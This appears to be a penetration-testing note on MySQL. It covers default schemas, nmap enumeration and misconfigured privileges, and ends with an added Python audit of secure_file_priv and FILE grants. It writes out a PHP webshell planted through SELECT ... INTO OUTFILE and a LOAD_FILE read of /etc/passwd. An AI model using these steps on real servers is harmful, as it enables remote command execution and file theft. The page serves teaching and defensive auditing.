🐬MySQL

Default system schemas/databases

  • mysql - the system database containing the tables that store information required by the MySQL server (accounts, grants, and so on)

  • information_schema - provides read access to database metadata

  • performance_schema - a feature for monitoring MySQL Server execution at a low level

  • sys - a set of objects that helps DBAs and developers interpret the data collected by the Performance Schema

Enumeration

Basic Nmap scan to grab the banner of the SQL server

  • 3306 - MySQL

nmap -Pn -sVC -p 3306 IP

Misconfigurations

If anonymous access is enabled, the service can be reached without any credentials.

Other common problems stem from how privileges are set; with overly broad privileges we may be able to:

  • Read or change the contents of the DB

  • Read or change server configuration

  • Execute commands

  • Read local files

  • Capture the local system hash

Reading the Database

MySQL

mysql -u user -pPassword1 -h 10.129.20.13
SHOW DATABASES;

+--------------------+
| Database           |
+--------------------+
| information_schema |
| users              |
+--------------------+
2 rows in set (0.00 sec)

Command Execution

If we have the appropriate privileges, we can use the SQL database to execute system commands.

Write Local Files

We can achieve command execution if we write to a location in the file system that can successfully execute our commands.

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

The global system variable secure_file_priv limits the effect of data import and export operations such as:

  • LOAD DATA

  • SELECT ... INTO OUTFILE

  • the LOAD_FILE() function

We can now try to visit the URL to use our uploaded file:

http://IP/webshell.php

secure_file_priv can be:

  • Empty - no restrictions apply, the server can read and write anywhere the mysqld process has access

  • Set to the name of a directory - the server limits import and export operations to that directory

  • Set to NULL - the server disables import and export operations entirely

We can check whether the variable is set:

show variables like "secure_file_priv";

Read Local Files

This is not enabled by default, but if the right privileges are granted we can read local files with LOAD_FILE():

select LOAD_FILE("/etc/passwd");
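As an added example (not part of the original notes), the following Python helper turns the secure_file_priv states and the privilege issues described above (anonymous accounts, accounts that can read or write local files) into an audit a defender can run over the output of SHOW VARIABLES and a query against mysql.user. The sample values are constructed; the helper names and the dictionary shape are assumptions, not anything MySQL itself provides.

```python
"""Audit the MySQL file-access settings discussed above (constructed sample data)."""


def classify_secure_file_priv(value):
    """Map the raw secure_file_priv value to (state, risk).

    value is the string reported by SHOW VARIABLES; None or "NULL" means
    import/export operations are disabled, "" means no restriction at all,
    anything else is the single directory the server is limited to.
    """
    if value is None or value.upper() == "NULL":
        return ("disabled", "low")
    if value == "":
        return ("unrestricted", "high")   # INTO OUTFILE / LOAD_FILE anywhere mysqld can reach
    return ("restricted", "medium")       # confined to one directory; still review that path


def audit_user_rows(rows):
    """Flag risky accounts.

    rows: list of dicts shaped like the result of
    SELECT user, host, File_priv FROM mysql.user (assumed shape).
    Returns a list of (user, host, finding) tuples.
    """
    findings = []
    for r in rows:
        if r["user"] == "":
            findings.append((r["user"], r["host"], "anonymous account"))
        # The FILE privilege is what makes LOAD_FILE() and INTO OUTFILE usable;
        # anything other than root@localhost holding it deserves a look.
        if r["File_priv"] == "Y" and (r["user"], r["host"]) != ("root", "localhost"):
            findings.append((r["user"], r["host"], "FILE privilege granted"))
    return findings


# Constructed sample: an empty secure_file_priv plus three accounts.
SAMPLE_SECURE_FILE_PRIV = ""
SAMPLE_USERS = [
    {"user": "root", "host": "localhost", "File_priv": "Y"},
    {"user": "", "host": "%", "File_priv": "N"},          # anonymous login allowed
    {"user": "webapp", "host": "%", "File_priv": "Y"},    # app account with FILE
]


def run_audit(secure_file_priv=SAMPLE_SECURE_FILE_PRIV, users=SAMPLE_USERS):
    """Combine both checks into one report dictionary."""
    return {
        "secure_file_priv": classify_secure_file_priv(secure_file_priv),
        "accounts": audit_user_rows(users),
    }


if __name__ == "__main__":
    print(run_audit())
```

The remediation for an "unrestricted" result is to set secure_file_priv to a dedicated directory (or NULL) in the server configuration and to revoke FILE from any account that does not need it.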
